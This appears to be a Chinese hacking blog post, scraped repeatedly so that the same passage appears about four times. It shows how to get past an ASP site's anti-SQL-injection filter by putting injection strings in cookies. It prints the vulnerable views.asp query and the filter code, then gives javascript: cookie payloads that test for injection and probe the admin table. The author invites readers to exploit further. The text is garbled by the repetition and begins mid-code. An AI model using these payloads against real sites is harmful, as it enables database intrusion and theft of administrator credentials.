rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44544) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44543) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44542) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44541) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~